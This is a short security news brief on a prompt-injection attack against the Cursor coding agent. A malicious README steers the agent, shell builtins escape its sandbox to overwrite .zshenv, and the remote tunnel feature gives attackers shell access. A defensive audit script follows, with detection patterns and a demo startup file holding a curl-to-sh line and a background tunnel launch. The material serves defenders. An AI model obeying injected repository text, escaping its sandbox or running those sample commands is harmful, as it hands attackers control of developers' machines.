Cursor AI Vulnerability Exposed Developer Devices
Briefly

"The attack chain exploits an indirect prompt injection in coding agents and a command sandbox bypass to write code to the user's machine and abuse Cursor's remote tunnel feature to gain shell access."
"Detecting the attack at the network level is nearly impossible, as all the traffic goes through Microsoft Azure infrastructure."
"Because the macOS seatbelt sandbox allows writes to the home directory, builtins could be used to escape the sandbox and overwrite the .zshenv file, which is executed by every new Zsh shell instance."
"An attacker could inject prompts in a repository's README.md file and trick the user into opening the repository in Cursor."
The NomShub attack chain exploits an indirect prompt injection in Cursor AI together with a command sandbox bypass, enabling attackers to write code to the user's machine. The attack requires only that the victim open a malicious repository. The feature being abused is a legitimate binary, which gives the attacker full file system access on macOS systems. Detection at the network level is nearly impossible because the traffic is routed through Microsoft Azure infrastructure. Cursor's protections against shell commands do not cover shell builtins, which lets attackers escape the sandbox and execute malicious scripts.
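Because the sandbox still permits writes to the home directory, the Zsh startup files are the place a defender should watch. The following audit script is an added example (not code from SecurityWeek, Cursor or the researchers) that checks each Zsh startup file for recent modification and for indicator patterns; the patterns, the `code tunnel` command name and the sample file contents are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added defender-side example: audit Zsh startup files that a sandboxed
# agent could still write to. Indicator patterns are assumptions chosen to
# illustrate download-and-execute lines and background tunnel launches.
SUSPICIOUS_PATTERNS='code tunnel|cursor tunnel|curl[^|]*[|][[:space:]]*(ba|z)?sh|base64[^|]*[|][[:space:]]*(ba|z)?sh|nohup .*&'

# count_suspicious FILE -> prints the number of lines matching the patterns
# (0 when the file is missing or clean); never fails, so it is safe under set -e.
count_suspicious() {
    local file="$1"
    [ -r "$file" ] || { echo 0; return 0; }
    grep -Ec "$SUSPICIOUS_PATTERNS" "$file" || true
}

# audit_zsh_startup [HOME_DIR] -> reports each startup file in HOME_DIR
audit_zsh_startup() {
    local home="${1:-$HOME}" f path n
    for f in .zshenv .zprofile .zshrc .zlogin; do
        path="$home/$f"
        [ -f "$path" ] || continue
        # Recent modification is itself worth a look, even without indicators.
        if [ -n "$(find "$path" -mtime -2 2>/dev/null)" ]; then
            echo "[*] $path modified within the last 2 days"
        fi
        n=$(count_suspicious "$path")
        if [ "$n" -gt 0 ]; then
            echo "[!] $path: $n suspicious line(s)"
            grep -En "$SUSPICIOUS_PATTERNS" "$path"
        else
            echo "[ ] $path: no indicators"
        fi
    done
}

# Demo on a constructed startup file (sample content, not a real finding).
demo=$(mktemp -d)
printf '%s\n' 'export PATH="$HOME/bin:$PATH"' \
    'curl -fsSL https://example.invalid/setup | sh' \
    'nohup code tunnel >/dev/null 2>&1 &' > "$demo/.zshenv"
audit_zsh_startup "$demo"
rm -rf "$demo"
```

Run `audit_zsh_startup` with no argument to check the current user's home directory.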
Read at SecurityWeek